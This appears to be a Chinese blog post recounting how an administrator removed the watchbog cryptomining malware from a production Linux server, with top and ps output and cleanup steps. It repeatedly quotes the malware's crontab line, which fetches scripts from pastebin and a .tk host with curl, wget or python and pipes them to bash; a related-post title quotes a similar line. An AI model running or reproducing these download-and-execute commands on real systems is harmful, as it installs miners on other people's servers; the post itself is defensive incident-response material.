1. 1 挖矿病毒watchbog处理过程

    简要说明

    这段时间公司的生产服务器中了病毒watchbog,cpu动不动就是100%,查看cpu使用情况,发现很大一部分都是us,而且占100%左右的都是进程watchbog,怎么办?

    前期操作:
#top -H

top - 23:46:20 up  2:20,  4 users,  load average: 17.50, 11.47, 8.05

Threads: 876 total,  18 running, 858 sleeping,   0 stopped,   0 zombie

%Cpu(s): 99.9 us,  0.1 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st

KiB Mem : 65806080 total, 50549892 free, 13517884 used,  1738304 buff/cache

KiB Swap:  8388604 total,  8388604 free,        0 used. 51616500 avail Mem

  PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND

26548 root      20   0   74908   4452      4 R 99.7  0.0   4:40.07 watchbog            #全部这个程序占用cpu

26551 root      20   0   74908   4452      4 R 99.7  0.0   4:38.46 watchbog

26553 root      20   0   74908   4452      4 R 99.7  0.0   4:40.15 watchbog

26555 root      20   0   74908   4452      4 R 99.7  0.0   4:39.08 watchbog

26543 root      20   0   74908   4452      4 R 99.4  0.0   4:39.48 watchbog

26544 root      20   0   74908   4452      4 R 99.4  0.0   4:39.75 watchbog

26545 root      20   0   74908   4452      4 R 99.4  0.0   4:39.82 watchbog

26546 root      20   0   74908   4452      4 R 99.4  0.0   4:40.17 watchbog

26547 root      20   0   74908   4452      4 R 99.4  0.0   4:39.04 watchbog

26549 root      20   0   74908   4452      4 R 99.4  0.0   4:40.04 watchbog

26550 root      20   0   74908   4452      4 R 99.4  0.0   4:40.20 watchbog

26554 root      20   0   74908   4452      4 R 99.4  0.0   4:39.09 watchbog

26556 root      20   0   74908   4452      4 R 99.4  0.0   4:39.86 watchbog

26557 root      20   0   74908   4452      4 R 99.4  0.0   4:39.90 watchbog

26558 root      20   0   74908   4452      4 R 99.4  0.0   4:39.87 watchbog

26552 root      20   0   74908   4452      4 R 98.1  0.0   4:38.92 watchbog

25344 root      20   0  148956   2952   1448 R  1.6  0.0   0:04.71 top

 1556 root      20   0       0      0      0 S  0.3  0.0   0:07.39 xfsaild/dm-1

 2957 root      20   0  455156   8144   6264 S  0.3  0.0   0:00.58 NetworkManager

 3019 root      20   0  391352   6004   3136 S  0.3  0.0   0:00.20 gdbus

 3784 root      20   0 42.587g 9.874g  16528 S  0.3 15.7   0:08.14 java

 7693 root      20   0 42.587g 9.874g  16528 S  0.3 15.7   0:00.52 java

 7315 root      20   0 2629884  49276  17088 S  0.3  0.1   0:03.24 phantomjs

11885 nobody    20   0   24380   3924   2100 S  0.3  0.0   0:00.69 nginx

    1 root      20   0  189920   4972   2516 S  0.0  0.0   0:04.27 systemd

    2 root      20   0       0      0      0 S  0.0  0.0   0:00.01 kthreadd

    3 root      20   0       0      0      0 S  0.0  0.0   0:00.28 ksoftirqd/0

    5 root       0 -20       0      0      0 S  0.0  0.0   0:00.00 kworker/0:0H

    6 root      20   0       0      0      0 S  0.0  0.0   0:00.00 kworker/u32:0

    7 root      20   0       0      0      0 S  0.0  0.0   0:00.00 kworker/u33:0

    8 root      rt   0       0      0      0 S  0.0  0.0   0:00.32 migration/0

    9 root      20   0       0      0      0 S  0.0  0.0   0:00.00 rcu_bh

查看并分析

针对此问题,及时查找出问题根源,先查看定时任务及相应的目录

#ll /etc/cron

cron.d/       cron.deny     cron.monthly/ cron.weekly/

cron.daily/   cron.hourly/  crontab

    #ll /etc/cron.d

total 28

-rw-r--r--. 1 root root 128 Jul  8  2014 0hourly

-rw-r--r--  1 root root 539 Jan 11  2015 apache

-rw-r--r--. 1 root root 108 Jan 20  2015 raid-check

-rw-r--r--  1 root root 539 Jan 11  2015 root

-rw-------. 1 root root 235 Nov 12  2014 sysstat

-rw-r--r--  1 root root 539 Jan 11  2015 system

-rw-r--r--. 1 root root 187 Jan 28  2014 unbound-anchor

#crontab -l

*/9 * * * * sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

##

定时任务全是这样的任务,先删除先。

解决步骤:

步骤一:

首先把定时任务的目录权限修改

#chmod  -R 500 /etc/crontab

#chmod  -R 500 /etc/cron.monthly

#chmod  -R 500 /etc/cron.weekly

#chmod  -R 500 /etc/cron.daily

#chmod  -R 500 /etc/cron.hourly

#vim /etc/crontab        #删除不正常的

#rm -rf /etc/cron.monthly/* /etc/weekly/* /etc/cron.daily/* /etc/cron.hourly/*    #目录下所有的文件都删除

并根据crontab文件中,判断把/usr/bin/watchbog /usr/bin/httpntp /usr/bin/ftpsdns这几个文件删除

#rm -rf  /usr/bin/watchbog /usr/bin/httpntp /usr/bin/ftpsdns

并停掉进程

#ps -ef |grep watchbog|grep -v grep |awk '{print $2}'|xargs kill -9

初步操作之后,以为可以完成,但是几分钟后,cpu又是百分之百了,看来没有找到问题的根源,继续找

根据百度上的别人关于此问题的解决方法,先操作一下:

步骤二:

#iptables -A INPUT -s  pastebin.com -j DROP

#iptables -A OUTPUT -s pastebin.com -j DROP

#iptables -nL

并再次进行步骤一的操作。

然后继续观察,几分钟后,watchbog病毒又来了,看来这种方法不是很有效,没有找到真正找到病毒的根源

继续观察,发现如下问题

#ps -ef |grep wget

root       973   910  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       974   841  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       975   845  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       976   856  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       977   855  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|base

进行关闭wget进程时出现错误:

#ps -ef |grep wget|grep -v grep |xargs kill -9

kill: cannot find process "root"

Killed

同样,curl命令也感染了。

#ps -ef|grep curl

root       974   841  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       975   845  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       976   856  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       977   855  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       978   881  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       979   835  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       980   851  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

root       983   865  0 07:57 ?        00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash

同样删除也不行

#ps -ef |grep curl|grep -v grep |xargs kill -9

kill: cannot find process "root"

Killed

针对此问题,进行步骤三

1、先把命令curl,wget重命名

#mv /usr/bin/curl /usr/bin/lruc

#mv /usr/bin/wget /usr/bin/tegw

2、然后再次进行步骤一的操作

3、观察cpu的使用情况

#top -H

经过一二天的观察 ,最终确认此问题解决了

解决步骤再重复一下

第一步:

	先把curl,wget命令重命名,请看步骤三

第二步:

	删除定时任务及对应的挖矿病毒文件,请看步骤一

第三步:

	把病毒网站拒绝其访问,请看步骤二

第四步:

	再次启动一下xshell时,再次监控

	echo "Welcome your!"

bash: curl: command not found...

bash: wget: command not found...

bash: curl: command not found...

bash: wget: command not found...

bash: curl: command not found...

bash: wget: command not found...

bash: curl: command not found...

bash: wget: command not found...

bash: curl: command not found...

bash: wget: command not found...

bash: curl: command not found...

bash: wget: command not found...

就会发现原来挖矿病毒的使用什么技术来达到的,找到问题根源,就解决此问题了

至此,以上为挖矿病毒的解决方法。

挖矿病毒watchbog处理过程的更多相关文章

  1. 记一次生产主机中挖矿病毒"kintegrityds"处理过程!

    [记一次生产挖矿病毒处理过程]: 可能性:webaap用户密码泄露.Jenkins/redis弱口令等. 1.监控到生产主机一直load告警 2.进服务器 top查看进程,发现挖矿病毒进程,此进程持续 ...

  2. Watchbog挖矿病毒程序排查过程

    第1章 情况 1)服务器收到cpu报警,cpu被占用达到100%,登录服务器查看,发现cpu被一个watchbog的进程占满了,如下图所示: 2)并且无论如何都杀不掉,用kill杀掉后,其还是会隔一会 ...

  3. 记一次Linux服务器因redis漏洞的挖矿病毒入侵

    中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱. 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!! ...

  4. Linux应急响应(三):挖矿病毒

    0x00 前言 ​ 随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式.新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染 ...

  5. Window应急响应(六):NesMiner挖矿病毒

    0x00 前言 作为一个运维工程师,而非一个专业的病毒分析工程师,遇到了比较复杂的病毒怎么办?别怕,虽然对二进制不熟,但是依靠系统运维的经验,我们可以用自己的方式来解决它. 0x01 感染现象 1.向 ...

  6. Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)

    概要: 一.症状及表现 二.查杀方法 三.病毒分析 四.安全防护 五.参考文章 一.症状及表现 1.CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发 ...

  7. Linux挖矿病毒 khugepageds详细解决步骤

    一.背景 最近公司一台虚拟机被攻击,其中一种挖矿病毒.会伪CPU数.即如果用top命令只能看到一个cpu.并且负载不高.实际上整个负载300%以上,及时定时任务关掉也不起作用. 二.言归正传开始干掉这 ...

  8. 挖矿病毒、ddos入侵流程及溯源

    一 挖矿病毒简介  攻击者利用相关安全隐患向目标机器种植病毒的行为. 二 攻击方式 攻击者通常利用弱口令.未授权.代码执行.命令执行等漏洞进行传播.示例如下: 示例1:   POST /tmUnblo ...

  9. qW3xT.2,解决挖矿病毒。

    网站在运行期间感觉怪怪的,响应速度慢的不是一丁半点,带宽5M,不该是这样的呀 于是登录Xshell top命令 查看cpu情况如下 PID为3435的进程占用CPU过大,难道被病毒入侵了吗? 查看该进 ...

随机推荐

  1. Ext.net中Combobox如何绑定数据库中的值

    ];      ];      " />       </Items> </ext:ComboBox>

  2. react中如何处理日期格式整理

    1.第一种模式——对应组件:DatePicker: 需要引入 import moment from "moment"; values.cfjdrq = moment(values. ...

  3. 【c# 学习笔记】显示接口实现方法

    在接口  一张中,使用了隐式的接口实现方式,即在实现代码中没有制定实现那个接口中的CompareTo方法.相应地,自然就有显式的 接口实现方式,它指的是在实现过程中,明确指出实现哪一个接口中的哪一个方 ...

  4. VMware VSAN 设计规则

    1.集群节点数量:3-64台主机(生产环境最少4节点起,5.5版本支持32节点,6.0版本支持64节点),配置万兆网卡,主机规格应满足VSAN兼容性要求. 2.每台主机需配置磁盘组,每台主机的磁盘组数 ...

  5. 使用Apache,压力测试redisson的一般高并发

    安装 Linux linux直接yum -y install httpd-tools,然后ab -V测试 Windows 1查看80端口有没有被占用,netstat -ano | findstr &q ...

  6. react用redux 做的todolist

    ### 1. 创建项目  create - react - app  项目名(shop) ### 2. 进入项目,下载redux  cnpm install redux  --save  ### 3. ...

  7. 慕课零基础学java语言翁恺老师——第一周编程题

    温度转换(5分) 题目内容: 写一个将华氏温度转换成摄氏温度的程序,转换的公式是: °F = (9/5)*°C + 32 其中C表示摄氏温度,F表示华氏温度. 程序的输入是一个整数,表示华氏温度.输出 ...

  8. 日后成为人工智能领域的小大佬,立个flag~

    时间过的很快,仿佛就在昨天我还是一个机械在校硕士.但现在我已经开始在互联网企业中上班了,第一周的小任务进行简单的数据处理,自己搞的很不好,路还很长,但来日方长! 这周开始学习爬虫,最近会很忙,希望能改 ...

  9. HTML让字体闪动和滚动显示

    存粹的HTML让字体闪动显示: <html> <head> <title>TEST</title> <style type="text/ ...

  10. 【链接】js监听input输入框内容变化

    https://blog.csdn.net/idomyway/article/details/79078625 $("#input1").bind("input prop ...